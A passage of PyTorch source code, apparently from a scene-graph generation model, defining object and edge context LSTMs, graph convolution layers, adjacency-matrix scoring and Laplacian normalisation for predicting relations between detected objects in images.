self.max_num_obj = max_num_obj
self.adj_embed_dim = adj_embed_dim
self.mean_union_feat = mean_union_feat
self.adj_embed = adj_embed
self.ch_res = ch_res
self.use_bias = use_bias
self.use_vision = use_vision
self.use_tanh = use_tanh
self.limit_vision=limit_vision
self.with_gcn = with_gcn
self.fb_thr = fb_thr
self.relu_alpha = relu_alpha
self.with_biliner_score = with_biliner_score
self.gcn_adj_type = gcn_adj_type
self.num_gcn_layer = num_gcn_layer
self.nhead = nhead
self.where_gcn = where_gcn
self.with_gt_adj_mat = with_gt_adj_mat
self.type_gcn = type_gcn
self.edge_ctx_type = edge_ctx_type
self.nms_union = nms_union
assert order in ('size', 'confidence', 'random', 'leftright')
self.order = order
if self.mode == 'predcls_nongtbox':
self.order = 'random'
# EMBEDDINGS
#self.leakyrelu = nn.LeakyReLU(self.alpha)
embed_vecs = obj_edge_vectors(self.classes, wv_dim=self.embed_dim)
self.obj_embed = nn.Embedding(self.num_classes, self.embed_dim)
self.obj_embed.weight.data = embed_vecs.clone()
self.obj_embed2 = nn.Embedding(self.num_classes, self.embed_dim)
self.obj_embed2.weight.data = embed_vecs.clone()
if self.pass_embed_togcn:
self.obj_embed3 = nn.Embedding(self.num_classes, self.embed_dim)
self.obj_embed3.weight.data = embed_vecs.clone()
# This probably doesn't help it much
self.pos_embed = nn.Sequential(*[
nn.BatchNorm1d(4, momentum=BATCHNORM_MOMENTUM / 10.0),
nn.Linear(4, 128),
nn.ReLU(inplace=True),
nn.Dropout(0.1),
])
if self.nl_mul > 0:
self.mul_rnn = MultiLabelRNN(self.classes, embed_dim=self.embed_dim,
inputs_dim=pooling_dim,
hidden_dim=self.hidden_dim,
recurrent_dropout_probability=dropout_rate)
if self.nl_obj > 0 and self.mode != 'predcls_nongtbox':
obj_ctx_rnn_indim = self.obj_dim + self.embed_dim + 128
if self.with_gcn and self.where_gcn == 'stack':
obj_ctx_rnn_indim = self.obj_dim + self.embed_dim + 128
self.obj_ctx_rnn = AlternatingHighwayLSTM(
input_size=obj_ctx_rnn_indim,
hidden_size=self.hidden_dim,
num_layers=self.nl_obj,
recurrent_dropout_probability=dropout_rate)
decoder_inputs_dim = self.hidden_dim
if self.pass_in_obj_feats_to_decoder:
decoder_inputs_dim += self.obj_dim + self.embed_dim +128
if self.with_gcn :
decoder_inputs_dim = decoder_inputs_dim + self.hidden_dim
self.decoder_rnn = DecoderRNN(self.classes, embed_dim=self.embed_dim,
inputs_dim=decoder_inputs_dim,
hidden_dim=self.hidden_dim,
recurrent_dropout_probability=dropout_rate,
mode=self.mode)
if self.nl_obj == 0 or self.with_gcn:
obj_gcn_input_dim = self.obj_dim + self.embed_dim + 128
if self.where_gcn == 'stack':
obj_gcn_input_dim = self.hidden_dim
print('building obj gcn!')
self.obj_gc1 = GraphConvolution(obj_gcn_input_dim, self.hidden_dim)
#self.obj_gc1_re = gcn_layer(obj_gcn_input_dim, self.hidden_dim)
#self.obj_gc2 = gcn_layer(self.hidden_dim, self.hidden_dim)
#self.obj_gc2_re = gcn_layer(self.hidden_dim, self.hidden_dim)
#self.obj_gc1_fb = gcn_layer(self.obj_dim + self.embed_dim + 128, self.hidden_dim)
#self.obj_gc_obj2linear = nn.Linear(obj_gcn_input_dim,self.hidden_dim)
#self.obj_gc_obj2linear.weight = torch.nn.init.xavier_normal(self.obj_gc_obj2linear.weight, gain=1.0)
if self.nl_obj == 0:
self.decoder_lin = nn.Linear(self.hidden_dim, self.num_classes)
self.decoder_lin.weight = torch.nn.init.xavier_normal(self.decoder_lin.weight, gain=1.0)
if self.with_adj_mat:
if self.nl_adj > 0:
adj_input_dim = self.obj_dim + self.embed_dim + 128 + int(self.obj_dim/2)
if ch_res:
adj_input_dim = adj_input_dim + self.hidden_dim
self.adj_mat_rnn = AlternatingHighwayLSTM(input_size=adj_input_dim,
hidden_size=self.hidden_dim,
num_layers=self.nl_adj,
recurrent_dropout_probability=dropout_rate)
self.adj_mat_embed_decoder = nn.Linear(self.hidden_dim, self.adj_embed_dim)
self.adj_mat_lin = nn.Linear(self.adj_embed_dim, 2)
self.adj_mat_embed_encoder = nn.Linear(self.max_num_obj, self.adj_embed_dim)
self.feat_adj_mat_lin = nn.Linear(self.obj_dim, self.adj_embed_dim)
if (self.with_adj_mat and not self.with_gt_adj_mat) or self.type_gcn == 'gat':
if self.nl_obj > 0:
post_lstm_in = self.hidden_dim
if self.with_gcn and self.where_gcn == 'parall':
post_lstm_in = post_lstm_in + self.hidden_dim
elif self.with_gcn and self.where_gcn == 'stack':
post_lstm_in = self.hidden_dim
self.post_lstm_graph_obj = nn.Linear(post_lstm_in, self.pooling_dim)
self.post_lstm_graph_sub = nn.Linear(post_lstm_in, self.pooling_dim)
'''
self.post_lstm_graph_obj.weight.data.normal_(0, 10.0 * math.sqrt(1.0 / self.hidden_dim))
self.post_lstm_graph_obj.bias.data.zero_()
self.post_lstm_graph_sub.weight.data.normal_(0, 10.0 * math.sqrt(1.0 / self.hidden_dim))
self.post_lstm_graph_sub.bias.data.zero_()
'''
self.post_lstm_graph_obj.weight = torch.nn.init.xavier_normal(self.post_lstm_graph_obj.weight, gain=1.0)
self.post_lstm_graph_sub.weight = torch.nn.init.xavier_normal(self.post_lstm_graph_sub.weight, gain=1.0)
post_lstm_dim = self.hidden_dim
if self.with_gcn and self.where_gcn == 'parall':
post_lstm_dim = self.pooling_dim + self.embed_dim + 128
elif self.with_gcn and self.where_gcn == 'stack':
post_lstm_dim = self.hidden_dim
self.post_lstm_graph_obj_1 = nn.Linear(post_lstm_dim, self.pooling_dim)
self.post_lstm_graph_sub_1 = nn.Linear(post_lstm_dim, self.pooling_dim)
'''
self.post_lstm_graph_obj_1.weight.data.normal_(0, 10.0 * math.sqrt(1.0 / self.hidden_dim))
self.post_lstm_graph_obj_1.bias.data.zero_()
self.post_lstm_graph_sub_1.weight.data.normal_(0, 10.0 * math.sqrt(1.0 / self.hidden_dim))
self.post_lstm_graph_sub_1.bias.data.zero_()
'''
self.post_lstm_graph_obj_1.weight = torch.nn.init.xavier_normal(self.post_lstm_graph_obj_1.weight, gain=1.0)
self.post_lstm_graph_sub_1.weight = torch.nn.init.xavier_normal(self.post_lstm_graph_sub_1.weight, gain=1.0)
if self.nl_obj == 0:
self.post_lstm_graph = nn.Linear(self.pooling_dim + self.embed_dim + 128, self.pooling_dim * 2)
# Initialize to sqrt(1/2n) so that the outputs all have mean 0 and variance 1.
# (Half contribution comes from LSTM, half from embedding.
# In practice the pre-lstm stuff tends to have stdev 0.1 so I multiplied this by 10.
self.post_lstm_graph.weight.data.normal_(0, 10.0 * math.sqrt(1.0 / self.hidden_dim))
self.post_lstm_graph.bias.data.zero_()
if self.with_biliner_score:
self.graph_bilinear = nn.Linear(self.pooling_dim, 2, bias=False)
self.graph_bilinear.weight = torch.nn.init.xavier_normal(self.graph_bilinear.weight, gain=1.0)
self.graph_bilinear_1 = nn.Linear(self.pooling_dim, 2, bias=False)
self.graph_bilinear_1.weight = torch.nn.init.xavier_normal(self.graph_bilinear_1.weight, gain=1.0)
else :
self.rel_compress_graph = nn.Linear(self.pooling_dim, 2, bias=True)
self.rel_compress_graph.weight = torch.nn.init.xavier_normal(self.rel_compress_graph.weight, gain=1.0)
if self.use_bias:
self.freq_bias_graph = FrequencyBias(graph=True, with_bg=bg_num_graph!=0)
if self.mode == 'detclass':
return
if self.nl_edge > 0:
input_dim = self.embed_dim
if self.nl_obj > 0 and self.mode != 'predcls_nongtbox':
input_dim += self.hidden_dim
else:
input_dim += self.obj_dim + self.embed_dim + 128
if self.pass_in_obj_feats_to_edge:
input_dim += self.obj_dim
if self.ch_res:
input_dim += self.hidden_dim
if self.with_gcn:
input_dim += self.hidden_dim
if self.edge_ctx_type == 'union':
input_dim = 2 * self.embed_dim + self.pooling_dim
#if self.with_adj_mat:
# input_dim += self.adj_embed_dim
if self.mode == 'predcls_nongtbox':
self.obj_feat_att = nn.Linear( self.obj_dim + self.embed_dim + 128, self.attention_dim)
self.obj_label_att = nn.Linear( self.embed_dim, self.attention_dim)
#self.obj_feat_label_att = nn.Linear( self.obj_dim + self.embed_dim + 128+self.embed_dim, self.attention_dim)
self.att_weight = nn.Linear(self.attention_dim, 1)
#print('input_dim: ',input_dim)
self.edge_ctx_rnn = AlternatingHighwayLSTM(input_size=input_dim,
hidden_size=self.hidden_dim,
num_layers=self.nl_edge,
recurrent_dropout_probability=dropout_rate)
if self.edge_ctx_type == 'union':
decoder_inputs_dim = 3 * self.hidden_dim
self.decoder_edge_rnn = DecoderRNN(self.rel_classes, embed_dim=self.embed_dim,
inputs_dim=decoder_inputs_dim,
hidden_dim=self.hidden_dim,
recurrent_dropout_probability=dropout_rate,
type=self.edge_ctx_type)
'''
self.decoder_edge_linear = nn.Linear(decoder_inputs_dim, self.num_rels, bias=True)
self.decoder_edge_linear.weight = torch.nn.init.xavier_normal(self.decoder_edge_linear.weight, gain=1.0)
'''
if self.with_gcn:
print('building gcn! number layers',self.num_gcn_layer)
gcn_input_dim = self.hidden_dim
if self.where_gcn == 'parall':
gcn_input_dim += self.hidden_dim
if self.pass_embed_togcn:
gcn_input_dim += self.embed_dim
if self.pass_in_obj_feats_to_gcn:
gcn_input_dim += self.obj_dim + self.embed_dim + 128
self.gc_list = []
self.gc_re_list = []
self.gc2_list = []
self.gc2_re_list = []
''' '''
for i in range(self.num_gcn_layer):
self.gc_list.append(GraphConvolution(gcn_input_dim, self.hidden_dim))
#self.gc_re_list.append(gcn_layer(gcn_input_dim, self.hidden_dim))
'''
self.gc2_list.append(gcn_layer(hidden_dim, self.hidden_dim))
self.gc2_re_list.append(gcn_layer(hidden_dim, self.hidden_dim))
'''
self.gc = nn.Sequential(*self.gc_list)
#self.gc_re = nn.Sequential(*self.gc_re_list)
'''
self.gc2 = nn.Sequential(*self.gc2_list)
self.gc2_re = nn.Sequential(*self.gc2_re_list)
'''
self.gcn_input_dim = gcn_input_dim
def sort_rois(self, batch_idx, confidence, box_priors):
"""
:param batch_idx: tensor with what index we're on
:param confidence: tensor with confidences between [0,1)
:param boxes: tensor with (x1, y1, x2, y2)
:return: Permutation, inverse permutation, and the lengths transposed (same as _sort_by_score)
"""
cxcywh = center_size(box_priors)
if self.order == 'size':
sizes = cxcywh[:,2] * cxcywh[:, 3]
# sizes = (box_priors[:, 2] - box_priors[:, 0] + 1) * (box_priors[:, 3] - box_priors[:, 1] + 1)
assert sizes.min() > 0.0
scores = sizes / (sizes.max() + 1)
elif self.order == 'confidence':
scores = confidence
elif self.order == 'random':
scores = torch.FloatTensor(np.random.rand(batch_idx.size(0))).cuda(batch_idx.get_device())
elif self.order == 'leftright':
centers = cxcywh[:,0]
scores = centers / (centers.max() + 1)
else:
raise ValueError("invalid mode {}".format(self.order))
return _sort_by_score(batch_idx, scores)
@property
def num_classes(self):
return len(self.classes)
@property
def num_rels(self):
return len(self.rel_classes)
def convert_symmat(self, adj):
adj_union = (adj.permute(1, 0) > adj).type_as(adj)
adj = adj + (adj.permute(1,0)).mul(adj_union) - adj.mul(adj_union)
return adj
def edge_ctx(self, obj_feats, obj_dists, im_inds, obj_preds, box_priors=None):
"""
Object context and object classification.
:param obj_feats: [num_obj, img_dim + object embedding0 dim]
:param obj_dists: [num_obj, #classes]
:param im_inds: [num_obj] the indices of the images
:return: edge_ctx: [num_obj, #feats] For later!
"""
# Only use hard embeddings
obj_embed2 = self.obj_embed2(obj_preds)
inp_feats = torch.cat((obj_embed2, obj_feats), 1)
# Sort by the confidence of the maximum detection.
confidence = F.softmax(obj_dists, dim=1).data.view(-1)[
obj_preds.data + arange(obj_preds.data) * self.num_classes]
perm, inv_perm, ls_transposed = self.sort_rois(im_inds.data, confidence, box_priors)
#print('inp_feats: ',inp_feats.size())
edge_input_packed = PackedSequence(inp_feats[perm], ls_transposed)
edge_reps = self.edge_ctx_rnn(edge_input_packed)[0][0]
# now we're good! unperm
edge_ctx = edge_reps[inv_perm]
return edge_ctx
def obj_ctx(self, obj_feats, obj_dists, im_inds, obj_labels=None, box_priors=None, boxes_per_cls=None,
obj_ctx_gcn=None, rel_inds=None, rel_inds_offset=None,
union_feat=None, label_prior=None):
"""
Object context and object classification.
:param obj_feats: [num_obj, img_dim + object embedding0 dim]
:param obj_dists: [num_obj, #classes]
:param im_inds: [num_obj] the indices of the images
:param obj_labels: [num_obj] the GT labels of the image
:param boxes: [num_obj, 4] boxes. We'll use this for NMS
:return: obj_dists: [num_obj, #classes] new probability distribution.
obj_preds: argmax of that distribution.
obj_final_ctx: [num_obj, #feats] For later!
"""
# Sort by the confidence of the maximum detection.
confidence = F.softmax(obj_dists, dim=1).data[:, 1:].max(1)[0]
perm, inv_perm, ls_transposed = self.sort_rois(im_inds.data, confidence, box_priors)
# Pass object features, sorted by score, into the encoder LSTM
obj_inp_rep = obj_feats[perm].contiguous()
input_packed = PackedSequence(obj_inp_rep, ls_transposed)
encoder_rep = self.obj_ctx_rnn(input_packed)[0][0]
# Decode in order
adj_dis_softmax_obj = None
if self.with_gcn and self.where_gcn == 'parall':
obj_ctx_gcn = obj_ctx_gcn[perm].contiguous()
encoder_rep = torch.cat([obj_ctx_gcn, encoder_rep], -1)
adj_dist_owbias_obj = None
if self.with_gcn and self.where_gcn == 'stack':
encoder_rep_r = encoder_rep[inv_perm]
adj_pre = encoder_rep_r
if self.mode == 'sgdet':
#adj_obj_preds = obj_dists.max(1)[1]
if self.training:
#print('obj_labels', obj_labels)
adj_obj_preds = obj_labels.clone()
nonzero_pred = obj_dists[:, 1:].max(1)[1] + 1
is_bg = (adj_obj_preds.data == 0).nonzero()
if is_bg.dim() > 0:
adj_obj_preds[is_bg.squeeze(1)] = nonzero_pred[is_bg.squeeze(1)]
#print('obj_preds',obj_preds)
else:
adj_obj_preds = label_prior
#print('obj_preds', obj_preds)
'''
if self.training:
adj_obj_preds = obj_labels.clone()
else:
adj_obj_preds = obj_dists.max(1)[1]
'''
else:
if self.training or self.mode == 'predcls':
adj_obj_preds = obj_labels
else:
adj_obj_preds = obj_dists[:, 1:].max(1)[1] + 1
adj_dist_owbias_obj = self.from_pre_to_mat(obj_pre=adj_pre, sub_pre=adj_pre, rel_inds_graph=rel_inds,
vr_graph=union_feat,
rel_inds_offset_graph=rel_inds_offset,
obj_preds=adj_obj_preds, num=1)
adj_dis_softmax_obj = F.softmax(adj_dist_owbias_obj, -1)[:, 1]
obj_ctx_gcn \
= self.obj_gcn(encoder_rep_r,
im_inds=im_inds,
rel_inds=rel_inds,
adj_mat=adj_dis_softmax_obj
)
obj_ctx_gcn = obj_ctx_gcn[perm].contiguous()
encoder_rep = torch.cat([obj_ctx_gcn, encoder_rep], -1)
decoder_inp = PackedSequence(torch.cat((obj_inp_rep, encoder_rep), 1) if self.pass_in_obj_feats_to_decoder else encoder_rep,
ls_transposed)
#print(decoder_inp.size())
#print('obj_labels: ',obj_labels)
obj_dists, obj_preds_nozeros, obj_preds_zeros, decoder_rep = self.decoder_rnn(
decoder_inp, #obj_dists[perm],
labels=obj_labels[perm] if obj_labels is not None else None,
boxes_for_nms=boxes_per_cls[perm] if boxes_per_cls is not None else None,
obj_dists=obj_dists[perm],
)
obj_preds_nozeros = obj_preds_nozeros[inv_perm]
obj_preds_zeros = obj_preds_zeros[inv_perm]
#print('obj_preds: ', obj_preds)
obj_dists = obj_dists[inv_perm]
decoder_rep = decoder_rep[inv_perm]
if self.mode == 'predcls':
assert obj_labels is not None
obj_preds = obj_labels
obj_dists = Variable(to_onehot(obj_preds.data, self.num_classes))
decoder_rep = decoder_rep
obj_preds_nozeros = obj_preds
obj_preds_zeros = obj_preds
encoder_rep = encoder_rep[inv_perm]
return obj_dists, obj_preds_nozeros, obj_preds_zeros, encoder_rep, decoder_rep, adj_dist_owbias_obj
def obj_gcn(self, obj_feats, im_inds, rel_inds, adj_mat, num_layer=0,
obj_labels=None, box_priors=None, boxes_per_cls=None):
if self.gcn_adj_type == 'hard':
adj_mat_t = adj_mat > self.fb_thr + 0.01
adj_mat_t = adj_mat_t.type_as(obj_feats)
if self.gcn_adj_type == 'soft':
adj_mat_t = adj_mat
spare_adj_mat = torch.zeros([im_inds.size(0), im_inds.size(0)]).cuda(obj_feats.get_device(), async=True)
spare_adj_mat = Variable(spare_adj_mat)
spare_adj_mat[rel_inds[:, 1], rel_inds[:, 2]] = adj_mat_t
spare_adj_mat = self.convert_symmat(spare_adj_mat)
spare_adj_mat = self.adj_to_Laplacian(spare_adj_mat, type=self.gcn_adj_type)
x = F.elu(self.obj_gc1(obj_feats, spare_adj_mat))
x = F.dropout(x, self.dropout_rate, training=self.training)
'''
spare_adj_mat_re = torch.zeros([im_inds.size(0), im_inds.size(0)]).cuda(obj_feats.get_device(), async=True)
spare_adj_mat_re = Variable(spare_adj_mat_re)
spare_adj_mat_re[rel_inds[:, 2], rel_inds[:, 1]] = adj_mat_t
spare_adj_mat_re = self.adj_to_Laplacian(spare_adj_mat_re, type=self.gcn_adj_type)
x_re = F.relu(self.obj_gc1_re(obj_feats, spare_adj_mat_re))
x_re = F.dropout(x_re, self.dropout_rate, training=self.training)
'''
'''
x = F.relu(self.obj_gc2(x, spare_adj_mat))
x = F.dropout(x, self.dropout_rate, training=self.training)
x_re = F.relu(self.obj_gc2_re(x_re, spare_adj_mat_re))
x_re = F.dropout(x_re, self.dropout_rate, training=self.training)
'''
return x
def gen_adj_pre(self, obj_feats, obj_dists, im_inds, box_priors=None, use_bias=True):
adj_mat = None
'''
offset_num = []
num_imgs = rel_inds[:,0]
max_num_imgs = num_imgs.cpu().numpy().max()
max_num_imgs = int(max_num_imgs) + 1
rel_img_inds = num_imgs
img_id = torch.arange(max_num_imgs)
offset_id = torch.zeros_like(img_id)
id_ind_mat = im_inds[:,None] == im_inds[None,:]
rel_ind_mat = rel_img_inds[:,None] == rel_img_inds[None,:]
id_ind_mat = id_ind_mat.type_as(img_id)
num_per_imgs = id_ind_mat.sum(0)
offset_id[1:] = num_per_imgs[:-2]
offset_ind = rel_ind_mat * offset_id[None,:]
offset_ind = offset_ind.sum(1)
imd_ind_mat = im_inds[:,None] == im_inds[None, :]
imd_ind_mat = imd_ind_mat.type_as(obj_feats)
obj_rep = self.adj_mat_embed_decoder(obj_rep)
obj_rep = F.relu(obj_rep,True)
obj_rep_union = obj_rep[:,None,:] * obj_rep[None,:,:] * imd_ind_mat[:,:,None]
feat_adj_union = self.feat_adj_mat_lin(union_feat)
feat_adj_union = F.relu(feat_adj_union,True)
feat_adj_union_mat = torch.zeros_like(obj_rep_union)
feat_adj_union_mat[rel_inds[:,1],rel_inds[:,2],:] = feat_adj_union
feat_adj_union_mat = imd_ind_mat[:,:,None] * feat_adj_union_mat
adj_rep_union = obj_rep_union + feat_adj_union_mat
adj_mat_batch_id = self.adj_mat_lin(adj_rep_union)
#adj_mat_batch_id = F.softmax(adj_mat_batch_id, -1)
adj_mat_t = torch.zeros([adj_mat_batch_id.size(0),self.max_num_obj,2]).cuda(adj_mat_batch_id.get_device(),async=True)
adj_mat = torch.autograd.Variable(adj_mat_t)
adj_mat[rel_inds[:,1],rel_inds_offset[:,2]] = adj_mat_batch_id[rel_inds[:,1],rel_inds[:,2],]
'''
#adj_mat = F.sigmoid(adj_mat)
confidence = F.softmax(obj_dists, dim=1).data[:, 1:].max(1)[0]
perm, inv_perm, ls_transposed = self.sort_rois(im_inds.data, confidence, box_priors)
# Pass object features, sorted by score, into the encoder LSTM
obj_inp_rep = obj_feats[perm].contiguous()
input_packed = PackedSequence(obj_inp_rep, ls_transposed)
obj_rep = self.adj_mat_rnn(input_packed)[0][0]
adj_mat = obj_rep[inv_perm]
return adj_mat
def from_pre_to_mat(self, obj_pre, sub_pre, rel_inds_graph, vr_graph, rel_inds_offset_graph, \
obj_preds, num=0):
if num == 0:
subj_rep_graph = self.post_lstm_graph_sub(sub_pre)
obj_rep_graph = self.post_lstm_graph_obj(obj_pre)
if num == 1:
subj_rep_graph = self.post_lstm_graph_sub_1(sub_pre)
obj_rep_graph = self.post_lstm_graph_obj_1(obj_pre)
subj_rep_graph = F.dropout(subj_rep_graph, self.dropout_rate, training=self.training)
obj_rep_graph = F.dropout(obj_rep_graph, self.dropout_rate, training=self.training)
obj_rel_ind_graph = rel_inds_graph
vr_obj_graph = vr_graph
subj_rep_graph_rel = subj_rep_graph[rel_inds_graph[:, 1]]
obj_rep_graph_rel = obj_rep_graph[rel_inds_graph[:, 2]]
#prod_rep_graph = subj_rep_graph_rel * obj_rep_graph_rel
if self.use_vision:
if self.mode != 'predcls_nongtbox':
#prod_rep_graph = prod_rep_graph
subj_rep_graph_rel = subj_rep_graph_rel
obj_rep_graph_rel = obj_rep_graph_rel
if self.limit_vision:
# exact value TBD
subj_rep_graph_rel = torch.cat((subj_rep_graph_rel[:,:self.pooling_dim] * vr_obj_graph[:,:self.pooling_dim], subj_rep_graph_rel[:,self.pooling_dim:]), 1)
obj_rep_graph_rel = torch.cat((obj_rep_graph_rel[:,:self.pooling_dim] * vr_obj_graph[:,:self.pooling_dim], obj_rep_graph_rel[:,self.pooling_dim:]), 1)
else:
subj_rep_graph_rel = subj_rep_graph_rel * vr_obj_graph[:,:self.pooling_dim]
obj_rep_graph_rel = obj_rep_graph_rel * vr_obj_graph[:, :self.pooling_dim]
if self.use_tanh:
#prod_rep_graph = F.tanh(prod_rep_graph)
subj_rep_graph_rel = F.tanh(subj_rep_graph_rel)
obj_rep_graph_rel = F.tanh(obj_rep_graph_rel)
if self.with_biliner_score:
rel_dists_graph = self.bilinear_score_graph(subj_rep_graph_rel, obj_rep_graph_rel, num)
else:
prod_rep_graph = subj_rep_graph_rel * obj_rep_graph_rel
rel_dists_graph = self.rel_compress_graph(prod_rep_graph)
if self.use_bias:
rel_dists_graph = rel_dists_graph + self.freq_bias_graph.index_with_labels(torch.stack((
obj_preds[obj_rel_ind_graph[:, 1]],
obj_preds[obj_rel_ind_graph[:, 2]],
), 1))
'''
rel_dists_graph = rel_dists_graph + F.dropout(self.freq_bias_graph.index_with_labels(torch.stack((
obj_preds[obj_rel_ind_graph[:, 1]],
obj_preds[obj_rel_ind_graph[:, 2]],
), 1)),self.dropout_rate, training=self.training)
'''
rel_dists_graph = rel_dists_graph
#adj_mat_t = torch.zeros([adj_pre.size(0),self.max_num_obj,2]).cuda(rel_dists_graph.get_device(),async=True)
#pre_adj_mat = Variable(adj_mat_t)
#pre_adj_mat[rel_inds_graph[:,1],rel_inds_offset_graph[:,2]] = rel_dists_graph
return rel_dists_graph
def adj_to_Laplacian_spare(self, adj_mat):
eye_mat = torch.ones([1,adj_mat.size(0)])
eye_coo = torch.arange(adj_mat.size(0))
eye_coo = torch.cat([eye_coo[:,None],eye_coo[:,None]], -1)
spare_eye_mat = torch.sparse.FloatTensor(eye_coo, eye_mat, \
torch.Size([adj_mat.size(0), adj_mat.size(0)])).cuda(
adj_mat.get_device(), async=True)
adj_mat = adj_mat + spare_eye_mat
'''
degree_mat = torch.dot(adj_mat, adj_mat_t) * eye_mat
degree_mat_re = 1 / (degree_mat + 1e-8) * eye_mat
degree_mat_re = degree_mat_re ** (0.5)
'''
degree_mat = adj_mat.sum(-1)
degree_mat_re = 1 / (degree_mat + 1e-8)
dot_1 = degree_mat_re[:,None] * adj_mat
#print(dot_1.size(),degree_mat_re.size(),adj_mat.size())
return dot_1
def adj_to_Laplacian(self, adj_mat, type='hard'):
eye_mat = torch.eye(adj_mat.size(0)).cuda(adj_mat.get_device(),async=True)
eye_mat = Variable(eye_mat)
adj_mat = adj_mat + eye_mat
'''
degree_vec = adj_mat.sum(-1)
#degree_vec = torch.sqrt(degree_vec)
degree_mat_re_vec = (1 / (degree_vec + 1e-8))
degree_vec_r = adj_mat.sum(0)
#degree_vec_r = torch.sqrt(degree_vec_r)
degree_mat_re_vec_r = (1 / (degree_vec_r + 1e-8))
degree_mat_re = torch.zeros_like(adj_mat)
degree_mat_re_r = torch.zeros_like(adj_mat)
i = np.arange(adj_mat.size(0))
degree_mat_re[i,i] = degree_mat_re_vec
degree_mat_re_r[i,i] = degree_mat_re_vec_r
#adj_mat_L = degree_mat_re - adj_mat
dot_1 = (degree_mat_re @ adj_mat) @ degree_mat_re_r
#dot_1 = degree_mat_re @ adj_mat
'''
degree_mat = adj_mat.sum(-1)
degree_mat_re = 1 / (degree_mat + 1e-8)
dot_1 = degree_mat_re[:,None] * adj_mat
#print(dot_1.size(),degree_mat_re.size(),adj_mat.size())
return dot_1
def gcn_ctx(self, ctx_feat, adj_mat, im_inds, rel_inds, num_layer=0, obj_preds=None,
rel_inds_offset=None):
'''
Args:
ctx_feat:
adj_mat:
im_inds:
rel_inds:
rel_inds_offset:
Returns:
'''
'''
if adj_mat is None:
spare_value = torch.ones([rel_inds.size(0),rel_inds.size(0)]).cuda(ctx_feat.get_device(),async=True)
spare_value = Variable(spare_value)
else:
spare_value = adj_mat > self.fb_thr
spare_value = spare_value.type_as(ctx_feat)
spare_value = spare_value[rel_inds[:,1],rel_inds_offset[:,2]]
#spare_value = spare_value
spare_adj_mat = torch.sparse.FloatTensor(rel_inds[1:3],spare_value, \
torch.Size([im_inds.size(0),im_inds.size(0)]))
spare_adj_mat_re = torch.sparse.FloatTensor(rel_inds[1:3][:,::-1], spare_value, \
torch.Size([im_inds.size(0), im_inds.size(0)]))
coo_rel = torch.where(adj_mat > self.fb_thr + 0.01)
ones_rel = torch.ones([1, coo_rel.size(0)]).cuda(ctx_feat.get_device(),async=True)
spare_adj_mat = torch.sparse.FloatTensor(coo_rel[0:2], ones_rel, \
torch.Size([im_inds.size(0),im_inds.size(0)])).cuda(ctx_feat.get_device(),async=True)
spare_adj_mat_re = torch.sparse.FloatTensor(coo_rel[0:2][:, ::-1], ones_rel, \
torch.Size([im_inds.size(0), im_inds.size(0)])).cuda(ctx_feat.get_device(),async=True)
adj_mat_t = adj_mat > self.fb_thr + 0.01
adj_mat_t = adj_mat_t.type_as(ctx_feat)
spare_adj_mat = torch.zeros([im_inds.size(0), im_inds.size(0)]).cuda(ctx_feat.get_device(),async=True)
spare_adj_mat_re = torch.zeros([im_inds.size(0), im_inds.size(0)]).cuda(ctx_feat.get_device(),async=True)
spare_adj_mat = Variable(spare_adj_mat)
spare_adj_mat_re = Variable(spare_adj_mat_re)
spare_adj_mat[rel_inds[:,1],rel_inds[:,2]] = adj_mat_t[rel_inds[:,1],rel_inds[:,2]]
spare_adj_mat_re[rel_inds[:, 2], rel_inds[:, 1]] = adj_mat_t[rel_inds[:, 1], rel_inds[:, 2]]
spare_adj_mat = self.adj_to_Laplacian(spare_adj_mat)
spare_adj_mat_re = self.adj_to_Laplacian(spare_adj_mat_re)
'''
if self.gcn_adj_type == 'hard':
adj_mat_t = adj_mat > self.fb_thr + 0.01
adj_mat_t = adj_mat_t.type_as(ctx_feat)
if self.gcn_adj_type == 'soft':
adj_mat_t = adj_mat
#pred_embed = self.obj_embed2(obj_preds)
spare_adj_mat = torch.zeros([im_inds.size(0), im_inds.size(0)]).cuda(ctx_feat.get_device(),async=True)
spare_adj_mat = Variable(spare_adj_mat)
spare_adj_mat[rel_inds[:,1],rel_inds[:,2]] = adj_mat_t
spare_adj_mat = self.convert_symmat(spare_adj_mat)
spare_adj_mat = self.adj_to_Laplacian(spare_adj_mat,type=self.gcn_adj_type)
x = F.elu(self.gc[num_layer](ctx_feat, spare_adj_mat))
x = F.dropout(x, self.dropout_rate, training=self.training)
'''
spare_adj_mat_re = torch.zeros([im_inds.size(0), im_inds.size(0)]).cuda(ctx_feat.get_device(),async=True)
spare_adj_mat_re = Variable(spare_adj_mat_re)
spare_adj_mat_re[rel_inds[:, 2], rel_inds[:, 1]] = adj_mat_t
spare_adj_mat_re = self.adj_to_Laplacian(spare_adj_mat_re,type=self.gcn_adj_type)
x_re = F.relu(self.gc_re[num_layer](ctx_feat, spare_adj_mat_re))
x_re = F.dropout(x_re, self.dropout_rate, training=self.training)
'''
'''
x = F.relu(self.gc2[num_layer](x, spare_adj_mat))
x = F.dropout(x, self.dropout_rate, training=self.training)
x_re = F.relu(self.gc2_re[num_layer](x_re, spare_adj_mat_re))
x_re = F.dropout(x_re, self.dropout_rate, training=self.training)
'''
return x, x
def bilinear_score_graph(self, sub, obj, num=0):
'''
Args:
obj: num_rel, dim_hid
sub: num_rel, dim_hid
Returns:
'''
prod_rep_graph = sub * obj
if num == 0:
rel_dists_graph = self.graph_bilinear(prod_rep_graph)
#rel_dists_graph = F.dropout(rel_dists_graph, self.dropout_rate, training=self.training)
if num == 1:
rel_dists_graph = self.graph_bilinear_1(prod_rep_graph)
#rel_dists_graph = F.dropout(rel_dists_graph, self.dropout_rate, training=self.training)
return rel_dists_graph
def bilinear_score_graph_obj(self, sub, obj):
'''
Args:
obj: num_rel, dim_hid
sub: num_rel, dim_hid
Returns:
'''
prod_rep_graph = sub * obj
rel_dists_graph = self.obj_graph_bilinear(prod_rep_graph)
#rel_dists_graph = F.dropout(rel_dists_graph, self.dropout_rate, training=self.training)
return rel_dists_graph
def mul_ctx_T(self, obj_feats, im_inds, num_obj_per):
'''
num_obj_per = im_inds[:,None] == im_inds[None,:]
num_obj_per = num_obj_per.type_as(im_inds)
num_obj_per = num_obj_per.sum(-1)
'''
mul_dist, _, mul_state = self.mul_rnn(obj_feats, obj_num=num_obj_per, im_inds=im_inds)
return mul_dist, mul_state
def get_union_box(self, rois, union_inds):
im_inds = rois[:, 0][union_inds[:, 0]]
union_rois = torch.cat((
im_inds[:, None],
torch.min(rois[:, 1:3][union_inds[:, 0]], rois[:, 1:3][union_inds[:, 1]]),
torch.max(rois[:, 3:5][union_inds[:, 0]], rois[:, 3:5][union_inds[:, 1]]),
), 1)
return union_rois
def max_pooling_image(self, obj_dist, num_box):
